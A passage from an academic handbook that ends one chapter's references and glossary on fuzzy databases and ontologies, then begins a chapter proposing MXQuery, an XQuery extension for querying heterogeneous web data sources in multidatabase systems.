Antoniou, G., & van Harmelen, F. (n.d.). Web ontology language: OWL. In S. Staab & R. Studer (Eds.), Handbook on ontologies (pp. 6793). Springer-Verlag. Aparcio, A. S., Farias, O. L. M., & dos Santos, N. (2005). Applying ontologies in the integration of heterogeneous relational databases. Proceedings of the 2005 Australasian Ontology Workshop (AOW ’05) (pp. 11–16). Darlinghurst, Australia: Australian Computer Society, Inc. Arperez, J. C., Corcho, O., Fernandez-Lopez, M., & Gómez-Pérez, A. (2001). WebOde: A scalable workbench for ontological engineering. Proceedings of the 1st International Conference on Knowledge Capture (K-CAP ’01) (pp. 6-13). New York: ACM Press. Aumueller, D., Do, H. -H., Massmann, S., & Rahm, E. (2005). Schema and ontology matching with COMA++. Proceedings of the 2005 ACM SIGMOD International Conference on Management of Data (SIGMOD ’05) (pp. 906–908). New York: ACM Press. Baldwin, J. F., & Zhou, S. Q. (1984). A fuzzy relational inference language. Fuzzy Sets and Systems (14), 155-174. Barrasa, J., Corcho, O., & Perez, A. G. (2003). Fund finder: A case study of database to ontology mapping. International Semantic Web Conference, Lecture Notes in Computer Science, 2870 (pp. 17–22). Springer-Verlag. Bechhofer, S. (2007). API for OWL ontologies. Retrieved from http://owl.man.ac.uk/api/readme. html Berners-Lee, T., Hendler, J., & Lassila, O. (2001). The semantic Web. Scientific American, 284(5), 28-37. Bizer, C. (2003). D2R map— A database to RDF mapping language. Proceedings of the 12th International World Wide Web Conference (pp. 17–22).
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Blanco, I., Martínez-Cruz, C., Marín, N., & Vila, M. A. (2005a). About the use of ontologies for fuzzy knowledge representation. Proceedings of the International Conference in Fuzzy Logic and Technology, EUSFLAT 2005 (pp. 106-111). Blanco, I., Martínez-Cruz, C., Serrano, J., & Vila, M. (2005b). A first approach to multipurpose relational database server. Mathware and Soft Computing, 12(2-3), 129-153. Breu, M., & Ding, Y. (2004). Modelling the world: Databases and ontologies. Whitepaper by IFI, Institute of Computer Science, University of Innsbruck. Brockmans, S., Volz, R., Eberhart, A., & Loffler, P. (2004). Visual modeling of OWL DL ontologies using UML. The Semantic Web, ISWC 2004, Lecture Notes in Computer Science, 3298 ( pp. 198-213). Berlin: Springer-Verlag. Buckles, B. P., & Petry, F. E. (1982). A fuzzy representation of data for relational databases. Fuzzy Sets and Systems (7), 213-226. Calero, C., Ruiz, F., Baroni, A., Brito e Abreu, F., & Piattini, M. (2005). An ontological approach to describe the SQL:2003 object-relational features. Computer Standards and Interfaces Journal, 28(6), 695-713. Carrasco, R. A., Vila, M. A., & Galindo, J. (2003). FSQL: A flexible query language for data mining. Enterprise Information Systems 4, 68-74. Chandrasekaran, B., Josephson, J., & Benjamins, V. (1999). What are ontologies, and why do we need them? IEEE Intelligent Systems, 14(1), 20-26. Chen, G. Q. (Ed.) (1999). Fuzzy logic in data modeling; Semantics, constraints, and database design. Kluwer Academic Publisher. Chen, G. Q., Vandenbulcke, J., & Kerre, E. E. (1992). A general treatment of data redundancy in a fuzzy relational data model. Journal of the American Society of Information Sciences (3), 304-311.
Choi, N., Song, I. -Y., & Han, H. (2006). A survey on ontology mapping. SIGMOD Record, 35(3), 34–41. Doan, A., Madhavan, J., Domingos, P., & Halevy, A. (2002). Learning to map between ontologies on the semantic Web. Proceedings of the Eleventh International WWW Conference (pp. 662-673). Hawaii. Dou, D., & LePendu, P. (2006). Ontology-based integration for relational databases. Proceedings of the 2006 ACM Symposium on Applied Computing (SAC ’06) (pp. 461–466). New York: ACM Press. Dou, D., LePendu, P., Kim, S., & Qi, P. (2006). Integrating databases into the semantic Web through an ontology-based framework. Proceedings of the 22nd International Conference on Data Engineering Workshops (ICDEW’06) (p. 54). Washington, DC: IEEE Computer Society. Duineveld, A. J., Stoter, R., Weiden, M. R., Kenepa, B., & Benjamins, V. R. (2000, June). Wonder-tools? A comparative study of ontological engineering tools. International Journal of Human-Computer Studies, 52(6), 1111-1133. Eriksson, U. (n.d.). LIBSBD: Database library for supporting multiple database management. Retrieved from http://siag.nu/libsdb/ Falkovych, K., Sabou, M., & Stuckenschmidt, H. (2003). UML for the semantic Web: Transformation-based approaches. Knowledge Transformation for the Semantic Web, 92–106. Finin, T., Mayfield, J., Joshi, A., Cost, R. S., & Fink, C. (2005). Information retrieval and the semantic Web. Proceedings of the 38th Annual Hawaii International Conference on System Sciences ( HICS S ’05)- Track 4 (p. 113.1). Washington, DC: IEEE Computer Society. Gal, A., Modica, G., Jamil, H., & Eyal, A. (2005). Automatic ontology matching using application semantics. AI Magazine, 26(1), 21–31.
2467
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Galindo, J., Urrutia, A., & Piattini, M. (Eds.). (2006). Fuzzy databases modeling, design, and implementa- tion. Hershey, PA: Idea Group Publishing. Gennari, J., Nguyen, M., & Silberfein, A. (n.d.). Datagenie. Retrieved from http://protege.cim3. net/cgi-bin/wiki.pl?DataGenie George, D. (2005). Understanding structural and semantic heterogeneity in the context of database schema integration. Journal of the Department of Computing (pp. 29-44). UCLan: IEEE Computer Society. Goble, C. (2003). Guest editorial: The semantic Web: An evolution for a revolution. Computer Networks, 42 (5), 551-556. Goguen, J. A. (2005). Data, schema, ontology, and logic integration. Logic Journal of the IGPL, 13(6), 685–715. Gómez-P´erez, A., F´ernandez-Lopez, M., & Corcho-Garc´ıa, O. (2003a). Methodologies, tools, and languages for building ontologies. Where is their meeting point? Data and Knowledge Engineering (46), 41-64. Gómez-Pérez, A., Férnandez-Lopez, M., & Corcho-García, O. (2003b). Ontological engineering. New York: Springer-Verlag, Inc. Gruber, T. R. (1993). Toward principles for the design of ontologies used for knowledge sharing (Tech. Rep. KSL 93-04). Stanford, CA: Knowledge Systems Laboratory, Stanford University.
dissertation, Interdisciplinary Center for Bioinformatics and Department of Computer Science, University of Leipzig. Germany. Hameed, A. Preece, A. & Sleeman, D. (2004). Ontology Reconcilitation. In S. Staab & R. Studer (Eds) Handbook on ontologies (pp. 231-250). Springer Hendler, J., Berners-Lee, T., & Miller, E. (2002). Integrating applications on the semantic Web. Journal of the Institute of Electrical Engineers of Japan, 122(10), 676-680. Hu, J., Nicholson, D., Mungall, C., Hillyard, A. L., & Archibald, A. L. (1996). WebinTool: A generic Web to database interface building tool. Proceedings of the 7th International Workshop on Database and Expert Systems Applications (DEXA ’96) (p. 285). Washington, DC: IEEE Computer Society. Information Technology Database Languages SQL, Parts 1 to 4 and 9 to 14 (2003). 9075-1:2003 to 9075-14:2003 International Standards. Kacprzyk, J., & Zadrozny, S. (2001). SQLF and fQuery for access. Proceedings of the Joint 9th IFSA World Congress and 20th NAFIPS International Conference: Vol. 4 ( pp. 2464-2469). Kalfoglou, Y., & Schorlemmer, M. (2003). Ontology mapping: The state of the art. The Knowledge Engineering Review, 18(1), 1-31. Kampman, A., & Broekstra, J. (n.d.). Sesame. Retrieved from http://www.openrdf.org/
Guarino, N. (1995). Formal ontology, concept analysis and knowledge representation. International Journal of Human and Computer Studies, 43(5/6), 625-640.
Lassila, O., & McGuinness, D. (2002). The role of frame-based representation on the semantic Web, K SL-01-02 (Tech. Rep.). Stanford, CA: Knowledge Systems Laboratory, Stanford University.
Guarino, N. (1998). Formal ontologies and information systems. Proceedings of FOIS ‘98 (pp. 3-15).
Lausen, H., & Stolberg, M. (2004, April). Semantic Web portals—State of the art survey (Tech. Rep. 2004-04-03). DERI, Digital Enterprise Research Institute.
Hai, D. H. (2005). Schema matching and mapping-based data integration. Unpublished doctoral
2468
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Lennat, D. (1995). CYC: A large-scale investment in knowledge infrastructure. Communications of the ACM, 33(8), 33-38. Ma, Z. (2005). Fuzzy database modeling with XML. Springer. Ma, Z. (2006). Fuzzy database modeling of imprecise and uncertain engineering information. Springer. McCool, R. (2005). Rethinking the semantic Web, part I. IEEE Internet Computing, 86-88. McCool, R. (2006). Rethinking the semantic Web, part II. IEEE Internet Computing, 93-96. Medina, J. M., Pons, O., & Vila, M. A. (1994). GEFRED: A generalized model of fuzzy relational databases. Information Sciences, 76 (1-2), 87-109. Medina, J. M., Vila, M. A., Cubero, J. C., & Pons, O. (1995). Towards the implementation of a generalized fuzzy relational database model. Fuzzy Sets and Systems, 75, 273-289. Mena, E., & Illarramendi, A. (2001). Ontologybased query processing for global information systems. Norwell, MA: Kluwer Academic Publishers. Noy, N. F. (2004). Semantic integration: A survey of ontology-based approaches. SIGMOD Record, 33(4), 65-70. Noy, N. F., & Hafner, C. D. (1997). The state of the art in ontology design. A survey and comparative review. The American Association for Artificial Intelligence, (18), 53-74. Ontological Engineering Group (OEG) from the Artificial Intelligence Department of the Computer Science Faculty (FI) from the Technical University of Madrid (Spain). (n.d.). WebOde Ontology Engineering Platform. Retrieved from http://webode.dia.fi.upm.es/WebODEWeb/index. html
Network of Excellence INTEROP, (2004, November). Ontology-based integration of Enterprise Modelling and Architecture & Platforms, Deliverable D8.1, State of the Art and State of Practice Including Initial Possible Research Orientations, Version 1.2, p. 12. Retrieved from www.interop-noe.org Open University (n.d.). WebOnto. Retrieved from http://webonto.open.ac.uk/ Oracle (n.d.). ISQLplus Web environment. Retrieved from http://150.214.108.124/isqlplus Pardede, E., & Wenny Rahayu, J. (n.d.). Impact of new SQL standard to database modeling. Retrieved from http://homepage.cs.latrobe.edu. au/ekpardede/paper/ENCYCLOPEDIA05-1.pdf P´erez de Laborda, C., & Conrad, S. (2005). Relational.OWL: A data and schema representation format based on OWL. Proceedings of the 2nd Asia-Pacific Conference on Conceptual Modelling (CRPIT ’43) (pp. 89–96). Darlinghurst, Australia: Australian Computer Society, Inc. Petry, F. E. (1996). Fuzzy databases: Principles and applications. Kluwer Academic Publishers. Prade, H., & Testemale, C. (1984). Generalizing database relational algebra for the treatment of incomplete/uncertain information and vague queries. Information Sciences (34), 113-143. Programme, H. L. S. W. (n.d.). Jena: A semantic Web framework for Java. Raju, K. V. S. V. N., & Majumdar, A. K. (1988). Fuzzy functional dependencies and lossless join decomposition of fuzzy relational database systems. ACM Transactions on Database Systems, 13(2), 129-166. Resource Description Framework (RDF) (1999). Retrieved from http://www.w3.org/RDF/ Roche, C. (2003). Ontology: A survey. Proceedings of the 8th Symposium on Automated Systems
2469
Looking for Information in Fuzzy Relational Databases Accessible Via Web
Based on Human Skill and Knowledge ( IFAC 2003), Goteborg, Sweden. Rodríguez, L. J. T. (2000). Extending RDBMS for allowing fuzzy quantified queries. Proceedings of DEXA 2000, LNCS 1873 (pp. 407-416). Springer-Verlag. Rundensteiner, E. A., Hawkes, L. W., & Bandler, W. (1989). On nearness measures in fuzzy relational data models. International Journal Approximate Reasoning (3), 267-298. Shenoi, S., & Melton, A. (1989). Proximity relations in the fuzzy relational databases. Fuzzy Sets and Systems, 31(3), 285-296. Sheth, A., Ramakrishnan, C., & Thomas, C. (2005). Semantics for the semantic Web: The implicit, the formal, and the powerful. Journal on Semantic Web and Information Systems, 1(1), 1-18. Staab, S., & Studer, R. (Ed.) (2004). Handbook on ontologies. Springer. Stanford Medical Informatics at the Stanford University School of Medicine. (n.d.). Protégé. Retrieved from http://protege.stanford.edu/ Stanford University. (n.d.). Ontolingua. Retrieved from http://www.ksl.stanford.edu/software/ontolingua/ Steve, G., Gangemi, A., & Pisanelli, D. (1998). Ontology integration: Experiences with medical ontologies. In N. Guarino (Ed.) Formal ontology in information systems, ( pp. 163-178). IOS Press. Studer, R., Benjamins, V., & Fensel, D. (1998). Knowledge engineering: Principles and methods. IEEE Transactions on Data and Knowledge Engineering, 25(1-2), 161-197. Su, X., & Ilebrekke, L. (2002). A comparative study of ontology languages and tools. Proceedings of CAiSE 2002 (pp. 761-765).
2470
Trinh, Q., Barker, K., & Alhajj, R. (2006). RDB2ONT: A tool for generating OWL ontologies from relational database systems. Proceed ings of AICT/ICIW (p. 170). IEEE Computer Society. Umano, M., & Fukami, S. (1994). Fuzzy relational algebra for possibility-distribution-fuzzy-relational model of fuzzy data. Journal of Intelligent Information Systems, 3, 7-28. Unchold, M., & Gruninger, M. (2004). Ontologies and semantics for seamless connectivity. SIGMOD Record, 33(4), 58-64. Upadhyaya, S. R., & Kumar, P. S. (2005). ERONTO: A tool for extracting ontologies from extended E/R diagrams. Proceedings of the 2005 ACM Symposium on Applied Computing (SAC ’05) (pp. 666–670). New York: ACM Press. Yabloko, Len, & Next Generation Software. (n.d.). OntoBase plug-in for Protégé. Retrieved from http://www.ontospace.net/pages/3/index.htm Zadeh, L. A. (1965). Fuzzy sets. Information and Control, 83, 338-353.
KEY TERMS Ontologies: An ontology is a data model that represents a domain and is used to reason about the objects in that domain and the relations between them. Database Schemas: Database schema is a description of the structure of a database or a directory (file systems); these can be: (a) conceptual schema, a map of concepts, and their relationships; (b) logical schema, a map of entities, and their attributes and relations; and (c) physical schema, a particular implementation of a logical schema. SQL: SQL is the most popular computer language used to create, modify, retrieve, and
Looking for Information in Fuzzy Relational Databases Accessible Via Web
manipulate data from relational database management systems. Semantic Web: The Semantic Web is a project that intends to create a universal medium for information exchange by putting documents with computer-processable meaning (semantics) on the World Wide Web. Data Base Catalog: The database catalog of a database instance consists of metadata in which definitions of database objects such as basis tables, view tables, synonyms, value ranges, indexes, users, and user groups are stored. OWL: Language Markup language for publishing and sharing data using ontologies on the Internet. OWL is a vocabulary extension of the Resource description framework (RDF) and is derived from the DAML+OIL Web Ontology Language (see also DAML and OIL). Together with RDF and other components, these tools make up the Semantic Web project.
Data Mapping is the process of creating data element mappings between two distinct data models. Data mapping is the first step in creating a data transformation between a data source and a destination. Schema Integration: It is a process that takes two schemas as input and produces a mapping between the elements that correspond to each other semantically. Fuzzy Database Management System: It is a system or software designed to manage a relational database, and run operations on the data requested by numerous clients. This system is extended in order to include the management of fuzzy data on it. Heterogeneous Data Integration Tools provide translation and integration for data sources over schemas of different species.
This work was previously published in the Handbook of Research on Web Information Systems Quality, edited by C. Calero, M. Moraga, and M. Piattini, pp. 301-323, copyright 2008 by Information Science Reference (an imprint of IGI Global).
2471
2472
Chapter 8.6
Integrating Heterogeneous Data Sources in the Web Angelo Brayner University of Fortaleza, Brazil Marcelo Meirelles University of Fortaleza, Brazil José de Aguiar Moraes Filho University of Fortaleza, Brazil
ABSTRACT Integrating data sources published on the Web requires an integration strategy that guarantees the local data sources’autonomy. A multidatabase system (MDBS) has been consolidated as an approach to integrate multiple heterogeneous and distributed data sources in flexible and dynamic environments such as the Web. A key property of MDBSs is to guarantee a higher degree of local autonomy. In order to adopt the MDBS strategy, it is necessary to use a query language, called the MultiDatabase Language (MDL), which provides the necessary constructs for jointly manipulating and accessing data in heterogeneous data sources. In other words, the MDL is responsible for solving integration conflicts. This chapter describes an extension to the XQuery Language,
called MXQuery, which supports queries over several data sources and solves such integration problems as semantic heterogeneity and incomplete information.
INTRODUCTION The Web (World Wide Web) can be seen as a wide network consisting of the union of several local area networks (LANs) spread over the entire world. However, the local networks that constitute the Web are autonomous and capable of plugging or unplugging themselves into and from the Web at any time. Over the last few years, the Web has been used to publish several databases. Of course, databases available on the Web are heterogeneous since they
might be defined by using different data models (e.g., relational or object data model), managed by different database systems (DBSs), or running in different computational environments (regarding operating system and hardware). Furthermore, the integration of databases on the Web should be realized without interfering in the management and processing of local data. In other words, databases should be integrated preserving the local autonomy of each database. Despite the fact that heterogeneity and the autonomy of multiple databases on the Web is a reality nowadays, users (and applications) need shared access to those databases. Thus, it is possible to submit queries against several heterogeneous databases located in distinct local networks throughout the Web. Consequently, integrating databases published on the Web has become a challenge to the database technology. Several approaches for integrating heterogeneous and autonomous data sources have been proposed since the late ’80s. In this chapter, we propose a strategy based on the multidatabase approach for integrating heterogeneous databases published on the Web. For that reason, we describe a new MultiDatabase Language (MDL), called MXQuery, since the proposed strategy uses XML (extensible markup language) as the common data model (CDM; conceptual schema) to represent the multiple data sources’ schemas. The MXQuery, which is an extension to the XQuery Language, provides constructors and operators for supporting queries over multiple heterogeneous data sources. The MXQuery solves integration problems such as semantic heterogeneity and incomplete information. Furthermore, this chapter presents an architecture to process MXQuery queries. This chapter is organized as follows. Approaches for integrating heterogeneous data sources are studied next. Then, related work is discussed, followed by a description of the MXQuery MultiDatabase Language. Next we present in detail the features of the proposed integration strategy, and then give an overview of the
query-processor architecture for the MXQuery Language. Finally, we conclude the chapter.
DATA-INTEGRATION APPROACHES Federated Databases Federated database is an approach for integrating heterogeneous databases. In a federation of databases, there is a federated schema global to all local component databases. With a federated schema, users make use of an external schema to submit data queries and updates. The federated schema suffers from the (local to global) schemaevolution drawback. In other words, an evolution (modification) of a local schema demands a corresponding modification of the federated (global) schema and can bring about a consistency-loss risk. Federated schema is static in the sense that its maintenance is up to a database administrator (DBA). In general, the federated schema is stored as part of each component database.
Mediators Motivated by the Web, several research works (Bougamin, Fabret, Mohan, & Valduriez, 2000; Chen, DeWitt, Tian, & Wang, 2000; Das, Shuster, & Wu, 2002; Goldman & Widom, 2000; Manolescu, Florescu, & Kossman, 2001) have focused on the issue of using mediators for integrating databases available on the Web. Mediators are usually specialized software components (and/or engines) for integrating data. A mediator provides a set of virtual views over different sources, called mediated schema, so that it does not change any local database (LDB) schemas. It provides a service for hiding all data characteristics from its users, allowing them to get data in a uniform way. With respect to the task of building an integrated view (federated or mediated schema), there are three different strategies. The first is
2473
Integrating Heterogeneous Data Sources in the Web
global-as-view (GAV), which is also called the global-schema-centric approach. The global schema is described as a view over the local schemas. In other words, each component of the global schema is defined in terms of the source schemas. Next is local-as-view (LAV), which is also called the source-centric approach. Local schemas are described as views over the global schema. In other words, the mappings may define the components of each source schema in terms of the global schema. Third is generalized local-as-view (GLAV), which is a mixed approach that consists of associating views over the global schema with views over local schemas.
Multidatabase An approach for integrating databases is the multidatabase technology, whose key feature is to provide interoperability among multiple heterogeneous and autonomous databases without attempting to integrate them by means of a single global schema (Elmagarmid, Rusinkiewicz, & Shethm, 1999). A multidatabase consists of a collection of autonomous databases, called local databases. Systems used to manage multidatabases are called multidatabase systems (MDBSs). An MDBS should provide full database functionality and is built on top of multiple DBSs, called local DBSs (LDBSs), each of which operates autonomously. Local autonomy is a key feature of the multidatabase technology. In an MDBS, the multidatabase language plays a key role since it guarantees database integration and interoperability. Roughly speaking, an MDL represents simultaneously the DDL and the DML of an MDBS. Notwithstanding, the MDL should provide additional features not presented by existing database languages (e.g., SQL). An example of such a feature is the ability to use logical database names for qualifying data in different databases. This is because the multidatabase approach shifts the integration task from global DBAs to users and
2474
local DBAs. Therefore, a global query should contain the necessary information for manipulating local data. This implies that the user knows what information is required and where it can be found. For that reason, it is important that an MDBS offers a tool, for example, an object browser, to help the user to obtain this knowledge. For a detailed discussion about multidatabase languages, the reader is referred to Domenig and Dittrich (2000), Elmagarmid, Bouguettaya, and Benatallah (1998), Grant, Litwin, Roussopoulos, and Sellis (1993), and Özsu and Valduriez (1999). In a context where the integration should be carried on in flexible and dynamic environments such as the Web and a high degree of autonomy of each local database is critical, the multidatabase approach is quite adequate. On the other hand, XML provides quite a natural way to be used as a common data model for data integration. It is powerful enough to represent structured, unstructured, and semistructured data. Moreover, its related technologies, such as DOM, XML schema, and XQuery, can contribute to the development of a standard mapping language. Therefore, in order to adopt the MDBS strategy to access data stored in data sources available on the Web, it is necessary to use a multidatabase language that (a) can support the capability to jointly manipulate data in different data sources and (b) can be based on the XML data model since XML is almost a de facto standard for data representation on the Web.
RELATED WORK Several MDLs have been proposed in order to provide support for accessing distributed and heterogeneous data sources. In Grant et al. (1993) and Litwin, Abdellatif, Zeroual, Nicolas, and Vigier (1989), an MDL called MSQL is proposed. In order to integrate heterogeneous databases by means of MSQL, the relational data model is used as the
Integrating Heterogeneous Data Sources in the Web
CDM. Although MSQL is more expressive than SQL, the language is quite limited in its ability to deal with structural incompatibilities. MSQL introduces semantic variables. However, such variables are only responsible for solving name conflicts (synonymous and homonymous). Furthermore, the join operation among databases is limited to domain-compatible operations (Missier & Rusimkiewicz, 1995). Finally, another limitation to MSQL, pointed out by Krishnamurthy, Litwin, and Kent (2001), is having to cope with schematic discrepancies or structural conflicts. As already mentioned, in order to use MSQL, it is necessary to adopt the relational model as the conceptual data model. In other words, MSQL allows only queries on relational schemas. Mapping a postrelational data model, such as a semistructured data model, in such a rigid data model is a quite complex task. Therefore, MSQL is not efficient for integrating data sources based on the Web. The work proposed by Missier and Rusimkiewicz (1995) defines global attributes that will represent the integration result from a query. Then, declarative instructions are used to map the attributes of the local databases to these global attributes. After the mapping definition (query context), one can submit queries against the data sources using a language borrowed from SQL. Furthermore, the queries can use implicit joins, which makes these queries more powerful and result oriented. The IDL language, presented by Krishnamurthy et al. (2001), allows solving the problems addressed by the MSQL language; however, the main contribution of the IDL is coping with structural conflicts, called schematic discrepancies (Krishnamurthy et al.). Although a part of these problems can be solved by the MSQL language, other kinds of problems cannot, for instance, integrating data represented as data in one schema and as metadata in another schema. Both approaches presented by Krishnamurthy et al. and Missier
and Rusimkiewicz (1995) are more expressive than the MSQL language. However, they are still limited by the relational data model. Domenig and Dittrich (2000) present an OQLlike language in which the data can be visualized at different conceptual levels. Such conceptual levels arrange the data from distinct data sources according to similar features. This conceptuallevel presentation is called data space, which is used for integrating structured, semistructured, and unstructured data. Since the OQL language presents mechanisms to query data sets, these mechanisms cannot be used to query over unstructured or semistructured data. For that reason, the authors present an extension to the OQL, called SOQL (Domenig & Dittrich, 2000). The SOQL approach defines two distinct steps for integrating data sources. In the first one, called preintegration, the DBAs identify similarities and conflicts among data sources and then specify correspondence rules among the schemas (query context). In the second step, called integration, the final schema is built from the correspondence rules. Despite the flexibility from that approach, it is necessary to build a (global) schema before submitting queries. Moreover, the schema must be rebuilt each time a new correspondence rule or a new data source comes into the multidatabase community. The approach proposed by Sattler, Conrad, and Saake (2000), called FRAQL, is similar to the approach presented in Missier and Rusimkiewicz (1995). The FRAQL language uses declarative instructions that make it possible to map objects from a local schema into objects of a global schema (Sattler et al., 2000). Initially, it is defined as a global schema that will be used for the users to submit queries. Then, the local schemas are mapped according to the global schema, where it is possible to use user-defined functions if is necessary. The correspondence between local and global schemas defines the query-execution context. The queries are submitted over the global
2475
Integrating Heterogeneous Data Sources in the Web
schema and then are translated into subqueries using the predefined mapping. Differently from the approach adopted in Domenig and Dittrich (2000), the FRAQL approach does not require one to rebuild the global schema whenever a new data source comes into the community. However, it is necessary to define a mapping between local and global schema before one can submit a query. The XQuery Language (Boag et al., 2003; Chamberlin, Robie, & Florescu, 2000; Robie, Chamberlin, & Florescu, 2000) has several features that allow querying XML documents and presenting a new XML document as a result. This new XML document can be a subtree from the original XML document or can present a different structure. These features make the XQuery Language quite expressive and powerful. Furthermore, it is possible to submit queries against multiple data sources. Although it is possible to represent union and join operations between these data sources, the XQuery Language does not present any mechanism for solving integration conflicts. Thus, the XQuery queries presume that distinct data sources were created in a single data-source design. The XQuery Language allows element construction, which makes it possible to repair the absence of mechanisms for conflict resolution. Despite the fact that element constructors present some facilities to solve conflicts, it does not give a formal mapping among attributes from distinct data sources. Therefore, such constructors do not define, in a simple way, the conceptual relationship among these data sources. Consequently, the XQuery queries are quite complex to query data in several data sources on the Web. Moreover, the XQuery Language does not cope with the connection and disconnection of data sources. This feature is essential in dynamic environments such as Web and ad hoc networks.
2476
MXQUERY The proposed MDL, MXQuery, extends the XQuery Language by introducing constructors and operators for supporting queries over multiple heterogeneous data sources. MXQuery should be used in the MDBS context, where local data sources are viewed as XML documents. MXQuery provides mechanisms for coping with semantic heterogeneity and incomplete information during the execution of queries over heterogeneous data sources. The XQuery Language is focused on querying semistructured data and, therefore, it presents flexible structures to identify the required information and arrange them according to the user’s specification. The MXQuery Language incorporates these features and introduces mapping declarations among distinct data sources to represent the conceptual relationship among those data sources. The idea behind MXQuery is to use mapping declarations among the data sources to one or more elements of an XML document, which will contain the query result. The mapping process is expressed in the query itself, making the MXQuery Language more flexible than the approaches presented in Missier and Rusimkiewicz (1995) and Sattler et al. (2000). Moreover, it is possible to use result variables, which represent the result XML document, and data-source variables, which represent the data sources, in the WHERE-clause specification. Thus, one may introduce filters (conditions) over data already integrated and/or over local data sources. For that reason, the existing conditions in the query are evaluated in two distinct moments. Conditions over local data sources are inserted in the subqueries submitted to the data sources. Conditions over integrated data are evaluated after the global result construction; that is, it is possible that the query postprocessor excludes elements after a condition evaluation. For instance, the
Integrating Heterogeneous Data Sources in the Web
expression “WHERE $p/book/year > ‘1999’,” in which $p represents a result XML document, is evaluated after the data integration. Thus, it could be generated as useless data traffic. elements with subelements that have values of less than 1999 are sent to the query manager (QM), and only after data integration are these elements discarded. However, in the MXQuery approach, the MDBS architecture tries first to transform the conditions over integrated data to conditions over local data sources. Such kinds of simplification could reduce the data traffic. Differently from the approaches proposed in Domenig and Dittrich (2000), Missier and Rusimkiewicz (1995), and Sattler et al. (2000), the MXQuery Language does not require a query context definition. Thus, queries expressed by the MXQuery are more dynamic and, consequently, they suffer less from influences of the local schema evolutions, and the connection and disconnection of new data sources. Therefore, when an MXQuery query is submitted, all information about how to integrate the local data sources is represented in the query. Coping with incomplete information is a great challenge for processing queries that access multiple heterogeneous data sources (Abiteboul, Segoufin, & Vianu, 2001; Tomasic, Raschid, & Valduriez, 1996). To solve this problem, MXQuery makes it possible to identify in a query what information is mandatory for the user. Nonmandatory information is considered as backing information. When such information is not available or even incorrectly defined, it is not returned in the query result. Consequently, the query processor can change the original query to extract any reference to an optional data source when the reference of the original query is unavailable at the moment of the query evaluation.
EFLWOR Expressions MXQuery introduces the notion of EFLWOR (each FLWOR) expressions, an extension to the
concept FLWOR expressions in the XQuery syntax. An EFLWOR expression has the functionality of traversing all elements of trees that represent XML documents. Recall that XML documents represent, in turn, a local data source in an MDBS. It is important to note that in the proposed integration strategy, each data source is viewed as an XML document. The result of an EFLWOR is represented by a tree as well, called a result tree. The result tree is produced through the union, join, and/or fusion (algebraic) operations over elements belonging to distinct XML documents, each of these representing a distinct local data source. Before defining those operations, it is important to define the concept of equivalence between two XML elements. Two XML elements are said to be equivalent if they have the same value for a given attribute, defined as a matching attribute. The idea behind the concept of XML-element equivalence is to identify elements that represent the same entity of the real world. The union operation is a binary operation in which the operands are XML documents. The union operation represents the less restrictive way to build a result tree for queries over heterogeneous data sources since it does not require type compatibility (as required in the relational data model, for example) between the operands. The union of two XML documents in MXQuery has the semantic of enclosing the operands as children of the root node of the result tree. The join operation in an MXQuery expression can be implicit or explicit. An implicit join is specified when the dereference operator is used in a path expression. An explicit join has the same semantic of a theta join of the relational algebra. For that reason, it is necessary to use a WHERE clause to specify the join condition in order to identify whether or not elements belonging to a distinct document satisfy the join condition. It is important to note that it is not possible to use the dereference operator for jointly manipulating distinct data sources. Consequently, only the ex-
2477
Integrating Heterogeneous Data Sources in the Web
plicit join can be used to perform joins between elements belonging to distinct data sources. The fusion operation is similar to the concept of the full outer join of the relational algebra. The result tree produced by a fusion operation encloses all elements belonging to distinct documents (data sources) that satisfy a join condition and the ones that do not satisfy that condition. Query 1 (under
“Using MXQuery” later in the chapter) illustrates a fusion operation. Since MXQuery extends XQuery, part of the MXQuery’s grammar can be found in Boag et al. (2003). Therefore, Table 1 extends the syntax description of the XQuery Language by introducing the EFLWOR expressions. The first column presents sequential numbers that represent clauses
of XQuery’s grammar (Boag et al.). In the table, the elements 144 to 147 have been inserted in the original XQuery grammar. The elements 42, 43, 44, 45, 46, 47, and 122 replace the elements from the original grammar. The EFLWOR expression from the MXQuery Language introduces the following new clauses: EACH, ALIAS, EQUAL, FULL, NULL, HIDE, and KEY. These clauses are used to identify the queried data sources and to specify the mapping between local attributes (from the local data sources) and global attributes (from the result tree). EACH. The EACH clause binds values to one or more variables, denoted as result variables. Such variables are used to construct the result tree that represents the result of the integrating process of the integration mechanism. For example, the clause “EACH $p” defines that a variable $p will contain the result of a query over multiple heterogeneous data sources. The rules for the integrating process (such as rules for conflict resolution) should be specified in other declarations of an MXQuery expression. A variable bound in an EACH clause is a well-formed XML document. For that reason, such a variable can be used in any other MXQuery clause that accepts a tree as an input parameter. ALIAS. This clause specifies one or more variables, denoted as source variables, representing an XML tree (document), which in turn represents a data source in the MXQuery integration strategy. Variables specified in an ALIAS clause can be used by any EFLWOR declaration that accepts a tree as an input parameter. In order to illustrate the use of an ALIAS clause, consider the following MXQuery expression: “ALIAS document (‘d2. xml’)/lib $d2.” This expression defines a variable $d2 that represents a data source represented by the document d2.xml. The document function defined in Boag et al. (2003) identifies an XML document that represents one local data source. Moreover, this function indicates the entry point in a forest of nodes of an XML document. The
declaration order from ALIAS clauses in an MXQuery expression specifies the priority of the data sources involved in the query. The priority order specified in an ALIAS clause will be used to solve value conflicts (Sattler et al., 2000) in which the values from elements belonging to data sources with a higher order of priority will be considered as valid values. For example, the first ALIAS declaration identifies the data source that has the higher priority. EQUAL. The optional EQUAL clause specifies rules for integrating elements belonging to distinct documents (data sources). This clause is responsible for resolving most of the integration conflicts. The key idea of an EQUAL clause is to specify semantic relationships among elements of distinct documents. For example, in the MXQuery expression “EQUAL $d1/livro $d2/book IS $p/book,” it is specified that the element of document $d1 and the element of the document $d2 represent the same concept of the real world; that is, they are synonyms. For that reason, the element and element will appear in the result as the element. The specification of an EQUAL clause can be shortened. For example, in the expression “EQUAL $d1/livro $d2/book IS $p/book,” this can be done by omitting the element of document $d2 since it has the same name as the new element ( element of $p). The shortened declaration is the following: “EQUAL $d1/livro IS $p/book.” In Query 1 (see “Using MXQuery” later in the chapter), one can observe the use of the abbreviation mechanism in an EQUAL clause. Normally, only elements referenced in some EQUAL-clause declaration will compose the variable specified in the EACH clause (see the definition of the FULL clause). FULL. The optional FULL clause can be used in association with the EACH clause. This clause specifies that all elements from all data sources declared in the ALIAS clauses will compose the result tree even though they are not declared in the EQUAL clause. If one does not specify any
2479
Integrating Heterogeneous Data Sources in the Web
